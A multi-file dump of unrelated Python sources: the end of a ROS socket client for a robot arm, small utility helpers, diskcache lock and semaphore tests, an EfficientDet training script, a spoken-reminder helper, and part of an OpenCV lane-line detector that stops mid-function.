    socket_cmd.action= 6  # reset to the initial/idle mode state
    print(data)
    print("Socket:", s)
    # Send the built command (client.send handles utf-8 encoding).
    s.send(data)
##-----------socket client--------
def socket_client():
    """Connect to the arm controller, then run the feedback loop until shutdown."""
    #global Socket
    try:
        Socket = client()
        Socket.get_connect()
        #Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        #Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))#iclab computerx
        print('Connection has been successful')
    except socket.error as msg:
        # Connection failure is fatal for this thread.
        print(msg)
        sys.exit(1)
    #print('Connection has been successful')
    Socket_feedback(Socket)  # blocks until the arm reports shutdown
    rospy.on_shutdown(myhook)
    Socket.close()
def Socket_feedback(s):
    """Poll the arm over the socket and mirror its state into ``state_feedback``.

    Each reply is raw bytes; byte 2 carries the arm state as an ASCII digit
    ('0' ready, '1' busy, '6' task finished) and byte 4 the sent-acknowledge
    flag ('0'/'1').  Indexing bytes yields ints, hence the comparisons with
    '48'/'49'/'54' (ASCII codes of '0', '1', '6').
    """
    Socket = s
    while 1:
        feedback_str = Socket.get_recieve()
        # Arm state reported by the controller.
        if str(feedback_str[2]) == '48':  # '0': arm ready for the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':  # '1': arm busy, cannot run the next command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':  # '6': strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        # Sent-acknowledge flag.
        if str(feedback_str[4]) == '48':  # returned 0 -> false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':  # returned 1 -> true
            state_feedback.SentFlag = 1
        # Leave the loop once the arm signals shutdown.
        if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
            break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
    """rospy shutdown hook: announce shutdown on stdout."""
    print("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6  # reset to the initial/idle mode state
    # Multithreading: run the socket client beside the ROS publisher.
    t = threading.Thread(target=socket_client)
    t.start()  # start the client thread
    #time.sleep(1)
    try:
        socket_talker()
    except rospy.ROSInterruptException:
        pass
    t.join()
    # end of multithreading
|
utils.py | import datetime
import functools
import os
import sys
import threading
import warnings
def deprecated(func):
    """Decorator that emits a DeprecationWarning on every call to ``func``."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # Temporarily force the warning to be shown even if filtered out.
        warnings.simplefilter('always', DeprecationWarning)
        warnings.warn(
            'Call to deprecated function {}.'.format(func.__name__),
            category=DeprecationWarning,
            stacklevel=2,
        )
        # Restore the default policy before delegating.
        warnings.simplefilter('default', DeprecationWarning)
        return func(*args, **kwargs)
    return wrapper
def exclude_keys(_dict, values):
    """Remove every key in ``values`` from ``_dict`` (in place) and return it.

    Fix: the original ``_dict.pop(value)`` raised KeyError when a requested
    key was absent; absent keys are now ignored so the helper works with
    optional fields.
    """
    for value in values:
        _dict.pop(value, None)  # tolerate missing keys
    return _dict
def get_dir_files(directory):
    """List entries of ``directory`` (current directory when falsy)."""
    target = directory or '.'
    return os.listdir(target)
def get_current_directory():
    """Return the current working directory with a trailing separator."""
    return f"{os.getcwd()}{os.path.normpath('/')}"
def get_platform():
    """Name of the running platform (e.g. 'linux', 'win32', 'darwin')."""
    return sys.platform
def unix_to_date(unix_timestamp):
    """Format a Unix timestamp as e.g. 'Jan 01 1970 00:00:00' (local time)."""
    moment = datetime.datetime.fromtimestamp(unix_timestamp)
    return moment.strftime('%b %d %Y %H:%M:%S')
def asynchronous(func):
    """Decorator: run ``func`` in a daemon thread; the call returns immediately
    and yields no result."""
    @functools.wraps(func)
    def launcher(*args, **kwargs):
        worker = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
        worker.start()
    return launcher
|
test_recipes.py | """Test diskcache.recipes."""
import shutil
import threading
import time
import pytest
import diskcache as dc
@pytest.fixture
def cache():
    """Yield a fresh diskcache.Cache and delete its directory afterwards."""
    with dc.Cache() as cache:
        yield cache
    shutil.rmtree(cache.directory, ignore_errors=True)
def test_averager(cache):
    """Averager keeps a running mean; pop() returns it and resets state."""
    nums = dc.Averager(cache, 'nums')
    for i in range(10):
        nums.add(i)
    assert nums.get() == 4.5
    assert nums.pop() == 4.5
    # After pop the averager starts over from empty.
    for i in range(20):
        nums.add(i)
    assert nums.get() == 9.5
    assert nums.pop() == 9.5
def test_lock(cache):
    """A second thread blocks on the cache-backed lock until it is released."""
    state = {'num': 0}
    lock = dc.Lock(cache, 'demo')

    def worker():
        state['num'] += 1
        with lock:
            assert lock.locked()
            state['num'] += 1
            time.sleep(0.1)

    with lock:
        thread = threading.Thread(target=worker)
        thread.start()
        time.sleep(0.1)
        # Worker ran its pre-lock increment but is blocked on the lock.
        assert state['num'] == 1
    thread.join()
    assert state['num'] == 2
def test_rlock(cache):
    """RLock is reentrant within a thread but still excludes other threads."""
    state = {'num': 0}
    rlock = dc.RLock(cache, 'demo')

    def worker():
        state['num'] += 1
        with rlock:
            # Nested acquisition by the same holder must not deadlock.
            with rlock:
                state['num'] += 1
                time.sleep(0.1)

    with rlock:
        thread = threading.Thread(target=worker)
        thread.start()
        time.sleep(0.1)
        # Worker incremented once, then blocked on the outer acquire.
        assert state['num'] == 1
    thread.join()
    assert state['num'] == 2
def test_semaphore(cache):
    """With all three slots held, another thread blocks until one is released."""
    state = {'num': 0}
    semaphore = dc.BoundedSemaphore(cache, 'demo', value=3)

    def worker():
        state['num'] += 1
        with semaphore:
            state['num'] += 1
            time.sleep(0.1)

    # Hold two of the three slots outright...
    semaphore.acquire()
    semaphore.acquire()
    # ...and the last one via the context manager, so the worker must wait.
    with semaphore:
        thread = threading.Thread(target=worker)
        thread.start()
        time.sleep(0.1)
        assert state['num'] == 1
    thread.join()
    assert state['num'] == 2
    semaphore.release()
    semaphore.release()
def test_memoize_stampede(cache):
    """Memoized worker computes at least once despite being called in a tight loop."""
    state = {'num': 0}

    @dc.memoize_stampede(cache, 0.1)
    def worker(num):
        time.sleep(0.01)
        state['num'] += 1
        return num

    start = time.time()
    while (time.time() - start) < 1:
        worker(100)
    # Hammering the same key for 1s with a 0.1s expiry must trigger at
    # least one real computation.
    assert state['num'] > 0
|
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import os
import pathlib
import sys
os.chdir(str(pathlib.Path(__file__).parent.absolute())+'/')
sys.path.append(str(pathlib.Path(__file__).parent.absolute()))
import multiprocessing
from functools import partial
from absl import app
from absl import flags
from absl import logging
import numpy as np
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'horovod', ''],
'Training: horovod for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=8,
help='Number of TPU cores per'
'replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 4, 2, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'The number of samples for '
'evaluation.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
'This option helps to rectify CPU memory leak. If set to True then every '
'epoch iteration is run in a separate process '
'for train_and_eval mode and the memory is cleared after each epoch.\n'
'Drawback: you need to kill 2 processes instead of one if '
'you want to interrupt training')
FLAGS = flags.FLAGS
def main(_):
  """Train and/or evaluate an EfficientDet model according to FLAGS.

  Supported FLAGS.mode values: 'train', 'eval', 'train_and_eval'.
  """
  if FLAGS.strategy == 'horovod':
    import horovod.tensorflow as hvd  # pylint: disable=g-import-not-at-top
    logging.info('Use horovod with multi gpus')
    hvd.init()
    # Pin each horovod worker to its own GPU.
    os.environ['CUDA_VISIBLE_DEVICES'] = str(hvd.local_rank())
  import tensorflow.compat.v1 as tf  # pylint: disable=g-import-not-at-top
  tf.enable_v2_tensorshape()
  tf.disable_eager_execution()

  if FLAGS.strategy == 'tpu':
    tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
        FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
    tpu_grpc_url = tpu_cluster_resolver.get_master()
    tf.Session.reset(tpu_grpc_url)
  else:
    tpu_cluster_resolver = None

  # Check data path
  if FLAGS.mode in ('train',
                    'train_and_eval') and FLAGS.training_file_pattern is None:
    raise RuntimeError('You must specify --training_file_pattern for training.')
  if FLAGS.mode in ('eval', 'train_and_eval'):
    if FLAGS.validation_file_pattern is None:
      raise RuntimeError('You must specify --validation_file_pattern '
                         'for evaluation.')

  # Parse and override hparams
  config = hparams_config.get_detection_config(FLAGS.model_name)
  config.override(FLAGS.hparams)
  if FLAGS.num_epochs:  # NOTE: remove this flag after updating all docs.
    config.num_epochs = FLAGS.num_epochs

  # Parse image size in case it is in string format.
  config.image_size = utils.parse_image_size(config.image_size)

  # The following is for spatial partitioning. `features` has one tensor while
  # `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
  # partition is performed on `features` and all partitionable tensors of
  # `labels`, see the partition logic below.
  # In the TPUEstimator context, the meaning of `shard` and `replica` is the
  # same; follwing the API, here has mixed use of both.
  if FLAGS.use_spatial_partition:
    # Checks input_partition_dims agrees with num_cores_per_replica.
    if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
      raise RuntimeError('--num_cores_per_replica must be a product of array'
                         'elements in --input_partition_dims.')
    labels_partition_dims = {
        'mean_num_positives': None,
        'source_ids': None,
        'groundtruth_data': None,
        'image_scales': None,
    }
    # The Input Partition Logic: We partition only the partition-able tensors.
    # Spatial partition requires that the to-be-partitioned tensors must have a
    # dimension that is a multiple of `partition_dims`. Depending on the
    # `partition_dims` and the `image_size` and the `max_level` in config, some
    # high-level anchor labels (i.e., `cls_targets` and `box_targets`) cannot
    # be partitioned. For example, when `partition_dims` is [1, 4, 2, 1], image
    # size is 1536, `max_level` is 9, `cls_targets_8` has a shape of
    # [batch_size, 6, 6, 9], which cannot be partitioned (6 % 4 != 0). In this
    # case, the level-8 and level-9 target tensors are not partition-able, and
    # the highest partition-able level is 7.
    feat_sizes = utils.get_feat_sizes(
        config.get('image_size'), config.get('max_level'))
    for level in range(config.get('min_level'), config.get('max_level') + 1):

      def _can_partition(spatial_dim):
        # True when the feature dimension is divisible by every partition dim.
        partitionable_index = np.where(
            spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
        return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)

      spatial_dim = feat_sizes[level]
      if _can_partition(spatial_dim['height']) and _can_partition(
          spatial_dim['width']):
        labels_partition_dims['box_targets_%d' %
                              level] = FLAGS.input_partition_dims
        labels_partition_dims['cls_targets_%d' %
                              level] = FLAGS.input_partition_dims
      else:
        labels_partition_dims['box_targets_%d' % level] = None
        labels_partition_dims['cls_targets_%d' % level] = None
    num_cores_per_replica = FLAGS.num_cores_per_replica
    input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
    num_shards = FLAGS.num_cores // num_cores_per_replica
  else:
    num_cores_per_replica = None
    input_partition_dims = None
    num_shards = FLAGS.num_cores

  params = dict(
      config.as_dict(),
      model_name=FLAGS.model_name,
      iterations_per_loop=FLAGS.iterations_per_loop,
      model_dir=FLAGS.model_dir,
      num_shards=num_shards,
      num_examples_per_epoch=FLAGS.num_examples_per_epoch,
      strategy=FLAGS.strategy,
      backbone_ckpt=FLAGS.backbone_ckpt,
      ckpt=FLAGS.ckpt,
      val_json_file=FLAGS.val_json_file,
      testdev_dir=FLAGS.testdev_dir,
      mode=FLAGS.mode)
  config_proto = tf.ConfigProto(
      allow_soft_placement=True, log_device_placement=False)
  if FLAGS.strategy != 'tpu':
    if FLAGS.use_xla:
      config_proto.graph_options.optimizer_options.global_jit_level = (
          tf.OptimizerOptions.ON_1)
    config_proto.gpu_options.allow_growth = True

  tpu_config = tf.estimator.tpu.TPUConfig(
      FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
      num_cores_per_replica=num_cores_per_replica,
      input_partition_dims=input_partition_dims,
      per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
      .PER_HOST_V2)

  if FLAGS.strategy == 'horovod':
    # Only rank 0 writes checkpoints/summaries under horovod.
    model_dir = FLAGS.model_dir if hvd.rank() == 0 else None
  else:
    model_dir = FLAGS.model_dir

  run_config = tf.estimator.tpu.RunConfig(
      cluster=tpu_cluster_resolver,
      model_dir=model_dir,
      log_step_count_steps=FLAGS.iterations_per_loop,
      session_config=config_proto,
      tpu_config=tpu_config,
      tf_random_seed=FLAGS.tf_random_seed,
  )

  model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
  max_instances_per_image = config.max_instances_per_image
  eval_steps = int(FLAGS.eval_samples // FLAGS.eval_batch_size)
  use_tpu = (FLAGS.strategy == 'tpu')
  logging.info(params)

  def _train(steps):
    """Build train estimator and run training if steps > 0."""
    train_estimator = tf.estimator.tpu.TPUEstimator(
        model_fn=model_fn_instance,
        use_tpu=use_tpu,
        train_batch_size=FLAGS.train_batch_size,
        config=run_config,
        params=params)
    train_estimator.train(
        input_fn=dataloader.InputReader(
            FLAGS.training_file_pattern,
            is_training=True,
            use_fake_data=FLAGS.use_fake_data,
            max_instances_per_image=max_instances_per_image),
        max_steps=steps)

  def _eval(steps):
    """Build estimator and eval the latest checkpoint if steps > 0."""
    eval_params = dict(
        params,
        strategy=FLAGS.strategy,
        input_rand_hflip=False,
        is_training_bn=False,
    )
    eval_estimator = tf.estimator.tpu.TPUEstimator(
        model_fn=model_fn_instance,
        use_tpu=use_tpu,
        train_batch_size=FLAGS.train_batch_size,
        eval_batch_size=FLAGS.eval_batch_size,
        config=run_config,
        params=eval_params)
    eval_results = eval_estimator.evaluate(
        input_fn=dataloader.InputReader(
            FLAGS.validation_file_pattern,
            is_training=False,
            max_instances_per_image=max_instances_per_image),
        steps=steps,
        name=FLAGS.eval_name)
    logging.info('Evaluation results: %s', eval_results)
    return eval_results

  # start train/eval flow.
  if FLAGS.mode == 'train':
    total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
    _train(total_examples // FLAGS.train_batch_size)
    if FLAGS.eval_after_training:
      _eval(eval_steps)
  elif FLAGS.mode == 'eval':
    # Run evaluation when there's a new checkpoint
    for ckpt in tf.train.checkpoints_iterator(
        FLAGS.model_dir,
        min_interval_secs=FLAGS.min_eval_interval,
        timeout=FLAGS.eval_timeout):
      logging.info('Starting to evaluate.')
      try:
        eval_results = _eval(eval_steps)
        # Terminate eval job when final checkpoint is reached.
        try:
          current_step = int(os.path.basename(ckpt).split('-')[1])
        except IndexError:
          logging.info('%s has no global step info: stop!', ckpt)
          break
        utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
        total_step = int((config.num_epochs * FLAGS.num_examples_per_epoch) /
                         FLAGS.train_batch_size)
        if current_step >= total_step:
          logging.info('Evaluation finished after training step %d',
                       current_step)
          break
      except tf.errors.NotFoundError:
        # Since the coordinator is on a different job than the TPU worker,
        # sometimes the TPU worker does not finish initializing until long after
        # the CPU job tells it to start evaluating. In this case, the checkpoint
        # file could have been deleted already.
        logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
  elif FLAGS.mode == 'train_and_eval':
    # Resume from the most recent checkpoint (model_dir first, then --ckpt).
    ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
    if not ckpt:
      ckpt = tf.train.latest_checkpoint(FLAGS.ckpt)
    try:
      step = int(os.path.basename(ckpt).split("-")[1])
      current_epoch = (
          step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
      logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
    except (IndexError, TypeError):
      logging.info("Folder has no ckpt with valid step.", FLAGS.model_dir)
      current_epoch = 0

    epochs_per_cycle = 1  # higher number has less graph construction overhead.

    def run_train_and_eval(e):
      # One cycle: train up to epoch ``e``, then evaluate and archive.
      print('-----------------------------------------------------\n'
            '=====> Starting training, epoch: %d.' % e)
      _train(e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
      print('-----------------------------------------------------\n'
            '=====> Starting evaluation, epoch: %d.' % e)
      eval_results = _eval(eval_steps)
      ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
      utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)

    for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
      if FLAGS.run_epoch_in_child_process:
        # Run each epoch in a child process so leaked CPU memory is
        # reclaimed when the process exits (see the flag's help text).
        p = multiprocessing.Process(target=partial(run_train_and_eval, e=e))
        p.start()
        p.join()
      else:
        run_train_and_eval(e)
  else:
    logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
  # absl entry point: parses FLAGS, then invokes main(argv).
  app.run(main)
|
reminder.py | import time
import keyboard
from playsound import playsound
import threading
def remainder_alarm(text, timeremind):
    """Worker thread: wait ``timeremind`` minutes, then announce ``text``.

    Plays the alarm sound in a loop until the user presses Space.
    """
    print("thread running..")
    local_time = float(timeremind)
    local_time = local_time * 60  # minutes -> seconds
    time.sleep(local_time)
    print(text)
    print("Press Space to stop")
    while True:
        playsound("./sounds/ffact.wav")
        time.sleep(0.5)
        if keyboard.is_pressed('space'):
            break
    return
def find_time_desp(query):
    """Extract the reminder description and delay (in minutes) from ``query``.

    Expects phrases like "remind me about <desc> after 2 hour 30 minutes".

    Returns
    -------
    tuple(str, int)
        (description, total delay = hours * 60 + minutes)
    """
    HH = 0
    MM = 0
    D = ''
    # Text after 'about', with the first 'after' removed; collapse the
    # doubled space that removal leaves behind (the original called
    # ``.replace(' ', ' ', 1)``, a no-op).
    desp = query.split('about')[1].replace(
        'after', '', 1).strip().replace('  ', ' ', 1)
    # The description is everything up to the first digit.
    for ch in desp:
        if ch.isdigit():
            break
        D += str(ch)
    tdata = query.split()
    # Accept both singular and plural hour tokens (original only knew 'hour').
    hindex = 0
    for token in ('hour', 'hours'):
        if token in tdata:
            hindex = tdata.index(token)
            break
    # Fix: the original checked 'minutes' then 'minute' with substring
    # find(); since 'minutes' contains 'minute', the second
    # ``tdata.index('minute')`` raised ValueError and reset the index to 0,
    # so "... after 20 minutes" yielded 0.  Check tokens exclusively.
    if 'minutes' in tdata:
        mindex = tdata.index('minutes')
    elif 'minute' in tdata:
        mindex = tdata.index('minute')
    else:
        mindex = 0
    try:
        # The quantity precedes its unit token.
        HH = int(tdata[hindex - 1]) if hindex > 0 else 0
        MM = int(tdata[mindex - 1]) if mindex > 0 else 0
    except (ValueError, IndexError):  # non-numeric or missing quantity
        HH = 0
        MM = 0
    return D.strip(), int(HH) * 60 + int(MM)
def remainder_init(text, time):
    """Spawn the reminder alarm on a background thread and return immediately."""
    # NOTE: the parameter named ``time`` shadows the ``time`` module here.
    alarm_thread = threading.Thread(target=remainder_alarm, args=(text, time))
    alarm_thread.start()
# dd, x = find_time_desp("remind me about xyz and abc after 20 minute")
# print(dd, x)
|
sunny_new_red_line_detect_simple_gazebo.py | #!/usr/bin/env python
from cv_bridge import CvBridge, CvBridgeError
from duckietown_utils.jpg import image_cv_from_jpg #location:f23-LED/led_detection/include
import threading
import rospy
import numpy as np
import cv2
import math
from sensor_msgs.msg import CompressedImage, Image
from ino_car.msg import LaneLine, LaneLines
class LineDetectorNode(object):
    def __init__(self):
        """Set up ROS pub/sub and all tunable detection parameters."""
        self.node_name = "LineDetectorNode"
        self.verbose = None  # when truthy, also builds debug segment images
        # Thread lock
        self.thread_lock = threading.Lock()
        # Constructor of line detector
        self.bridge = CvBridge()
        # Publishers
        self.pub_image = rospy.Publisher("~image_with_lines", Image, queue_size=1)
        self.pub_lines = rospy.Publisher("~segment_list", LaneLines, queue_size=1)
        # Subscribers
        self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
        #------------------------------------------
        # Region-of-interest trapezoid, expressed as fractions of image size.
        self.bottom_width = 0.85  # width of bottom edge of trapezoid, expressed as percentage of image width
        self.top_width = 0.75  # ditto for top edge of trapezoid
        self.height = 0.4  # height of the trapezoid expressed as percentage of image height
        self.height_from_bottom = 0.05  # height from bottom as percentage of image height
        self.x_translation = -0.01  # Can be +ve or -ve. Translation of midpoint of region of interest along x axis
        self.center = [0, 0]
        self.hasleft = False
        self.hasright = False
        self.lanewidth = 400  # assumed lane width — presumably pixels, TODO confirm
        # -----------------------------------------
        # Colour thresholds in HSV space (upper hue bound 180 matches
        # OpenCV's H range).
        self.hsv_white1 = np.array([0, 0, 150])
        self.hsv_white2 = np.array([180, 50, 255])
        self.hsv_yellow1 = np.array([25, 120, 90])
        self.hsv_yellow2 = np.array([45, 255, 255])
        self.hsv_red1 = np.array([0, 140, 100])
        self.hsv_red2 = np.array([15, 255, 255])
        # Second red range near hue 180 (red wraps around hue 0).
        self.hsv_red3 = np.array([165, 140, 100])
        self.hsv_red4 = np.array([180, 255, 255])
        self.dilation_kernel_size = 3
        #----------------------------------------
def _colorFilter(self,hsv,color):
    """Threshold `hsv` for one color ('white', 'yellow' or 'red').

    Returns (bw, color_segments): bw is a dilated binary mask for the
    requested color; color_segments is only built when self.verbose is
    truthy, otherwise an empty list.
    NOTE(review): if `color` is none of the three known values, `bw` is
    never assigned and the dilation below raises NameError.
    NOTE(review): color_segment is defined without a `self` parameter, so
    the verbose branch would raise TypeError if enabled -- confirm.
    """
    # threshold colors in HSV space
    bw_red = cv2.inRange(hsv, self.hsv_red1, self.hsv_red2)
    bw_white = cv2.inRange(hsv, self.hsv_white1, self.hsv_white2)
    bw_yellow = cv2.inRange(hsv, self.hsv_yellow1, self.hsv_yellow2)
    if color == 'white':
        bw = bw_white
    elif color == 'yellow':
        bw = bw_yellow
    elif color == 'red':
        bw = bw_red
    # binary dilation closes small gaps in the thresholded mask
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(self.dilation_kernel_size, self.dilation_kernel_size))
    bw = cv2.dilate(bw, kernel)
    if self.verbose:
        color_segments = self.color_segment(bw_white,bw_red,bw_yellow)
    else:
        color_segments = []
    return bw, color_segments
def detectLines(self,img,color,img_shape):
    """Run Hough on a binary edge image and fuse the segments per color.

    Return shape depends on `color`:
      'red'    -> (red_line, red_lines)          2-tuple
      'yellow' -> (yellow_line, yellow_lines)    2-tuple
      'white'  -> (left_line, right_line, lines) 3-tuple
    NOTE(review): the inconsistent arity means callers must hard-code the
    color they asked for; the white no-line branch uses a Python-2 print
    statement, so this file targets Python 2.
    """
    lines = self.hough_transform(img)
    # Removing horizontal lines detected from hough transform
    lane_lines = self.filter_horizontal_short_lines(lines)
    # Separating lines on left and right side of the highway lane
    lane_lines_=[]
    ## STOP ##
    if color == 'red':
        # stop lines are horizontal, so use the horizontal-keeping filter
        red_lane_lines = self.filter_vertical_short_lines(lines)
        if red_lane_lines is None:
            return None,None
        red_lane_line = self.draw_single_red_line( red_lane_lines )
        return red_lane_line, red_lane_lines
    if color == 'yellow':
        if lane_lines is None:
            return None,None
        for l in lane_lines:
            lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
        lane_line = self.draw_single_line(lane_lines_ ,img_shape)
        return lane_line,lane_lines
    if color == 'white':
        if lane_lines is None:
            print 'no white'
            return None,None,None
        for l in lane_lines:
            lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
        left_lines,right_lines = self.separate_white_lines(lane_lines_)
        right_lane_line = self.draw_single_line( right_lines,img_shape )
        left_lane_line = self.draw_single_line( left_lines,img_shape )
        return left_lane_line ,right_lane_line ,lane_lines
def filter_horizontal_short_lines(self,lines):
    """Drop short (< 20 px) and near-horizontal (within +/-10 deg) segments.

    Lane lines are close to vertical from the front-mounted camera, so
    near-horizontal Hough segments are noise.  Perfectly vertical segments
    cannot go through arctan(dy/dx) and are re-appended at the end.

    :param lines: Hough output, array of [[x1, y1, x2, y2]], or None
    :return: numpy array of surviving segments (non-horizontal ones first,
             verticals appended last), or None when `lines` is None

    Fixes: the garbled docstring, and a bug where vertical segments were
    collected from the *unfiltered* input, re-admitting segments shorter
    than 20 px that the length filter was supposed to remove.
    """
    if lines is None:
        return
    # 1. remove segments shorter than 20 px
    non_short_lines = [l for l in lines
                       if math.hypot(l[0][2] - l[0][0], l[0][3] - l[0][1]) >= 20]
    # 2. split off perfectly vertical segments (dx == 0) before the slope test
    non_vertical_lines = [l for l in non_short_lines if float(l[0][2] - l[0][0]) != 0]
    vertical_lines = [l for l in non_short_lines if float(l[0][2] - l[0][0]) == 0]
    # 3. keep only segments steeper than +/-10 degrees
    non_horizontal_lines = [l for l in non_vertical_lines if
                            not -10 <= np.rad2deg(np.arctan(float(l[0][3] - l[0][1]) / float(l[0][2] - l[0][0]))) <= 10]
    # verticals are by definition not horizontal: always keep them
    non_horizontal_lines.extend(vertical_lines)
    return np.array(non_horizontal_lines)
## STOP ##
def filter_vertical_short_lines(self,lines):
    """Keep only near-horizontal segments (slope within +/-10 degrees).

    Used for red stop lines, which appear horizontal in the camera frame.
    Segments shorter than 1 px and perfectly vertical ones are discarded.

    :param lines: Hough output, array of [[x1, y1, x2, y2]], or None
    :return: list of (x1, y1, x2, y2) tuples, or None when `lines` is None
    """
    if lines is None:
        return
    kept = []
    for seg in lines:
        x1, y1, x2, y2 = seg[0][0], seg[0][1], seg[0][2], seg[0][3]
        dx = float(x2 - x1)
        dy = float(y2 - y1)
        # degenerate, sub-pixel segment: ignore
        if math.sqrt(dx * dx + dy * dy) < 1:
            continue
        # vertical segment: no finite slope, and certainly not horizontal
        if dx == 0:
            continue
        angle = np.rad2deg(np.arctan(dy / dx))
        if -10 <= angle <= 10:
            kept += [(x1, y1, x2, y2)]
    return kept
def cbImage(self, image_msg):
    """Image-topic callback: hand the frame to a daemon worker thread.

    Returns immediately so the subscriber queue never blocks; the actual
    work happens in processImage on the spawned thread.
    """
    thread = threading.Thread(target=self.processImage,args=(image_msg,))
    # Fix: Thread.setDaemon() is deprecated (removed in newer Pythons);
    # assigning the `daemon` attribute works on both Python 2.6+ and 3.
    thread.daemon = True
    thread.start() #start execution
    # Returns rightaway
def loginfo(self, s):
    """Log `s` through rospy, prefixed with this node's name."""
    message = '[%s] %s' % (self.node_name, s)
    rospy.loginfo(message)
# generate color segments
def color_segment(self, area_white, area_red, area_yellow):
    """Compose the three binary masks into one BGR debug image.

    Each mask is tinted (white/red/yellow) and painted over the result
    wherever its pixels are non-zero; later masks overwrite earlier ones.

    Fix: this method is invoked as ``self.color_segment(...)`` from
    _colorFilter but was declared without ``self``, which made that call
    raise TypeError (4 args for a 3-arg function).
    """
    B, G, R = 0, 1, 2
    def white(x):
        # grayscale mask -> BGR, all channels kept
        x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
        return x
    def red(x):
        # keep only the red channel
